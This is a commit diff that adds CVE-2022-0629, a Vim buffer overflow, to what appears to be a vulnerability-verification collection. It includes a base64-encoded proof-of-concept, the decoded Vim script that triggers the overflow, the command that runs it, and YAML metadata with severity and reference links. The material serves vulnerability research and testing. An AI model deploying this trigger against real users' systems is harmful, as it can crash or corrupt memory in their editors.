ADD CVE-2022-0629

cve/vim/2022/CVE-2022-0629/README.md

@@ -0,0 +1,8 @@
+### 漏洞验证
+```shell
+$ echo -ne "bm9ybTEwMGdy3YAKZnUgUigpCmxldCBsaW5lPWdldGxpbmUoMSkKcmV0dSBsaW5lCmVuZGYKCmNh
+bGwgYXNzZXJ0X2VxdWFsKDEsUigpKQo=" | base64 -d > poc
+
+$ vim -u NONE -i NONE -n -X -Z -e -m -s -S poc -c ":qa!"
+```
+![](./png/CVE-2022-0629.png)

cve/vim/2022/CVE-2022-0629/poc

@@ -0,0 +1,7 @@
+norm100gr݀
+fu R()
+let line=getline(1)
+retu line
+endf
+
+call assert_equal(1,R())

cve/vim/2022/yaml/CVE-2022-0629.yaml

@@ -0,0 +1,20 @@
+id: CVE-2022-0629
+source: https://huntr.dev/bounties/95e2b0da-e480-4ee8-9324-a93a2ab0a877/
+info:
+  name: Vim是一款基于UNIX平台的编辑器。
+  severity: high
+  description: |
+    vim 存在安全漏洞，该漏洞源于GitHub存储库vim/vim 8.2之前的版本存在缓冲区溢出。
+  scope-of-influence:
+    vim<8.2
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-0629
+    - https://github.com/vim/vim/commit/34f8117dec685ace52cd9e578e2729db278163fc
+  classification:
+    cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
+    cvss-score: 7.8
+    cve-id: CVE-2022-0629 
+    cwe-id: CWE-787,CWE-121
+    cnvd-id: None
+    kve-id: None
+  tags: 缓冲区溢出,cve2022

vulnerability_list.yaml

@@ -23,5 +23,6 @@ cve:
     - CVE-2021-4034
   vim:
     - CVE-2022-0729
+    - CVE-2022-0629
 cnvd:
 kve: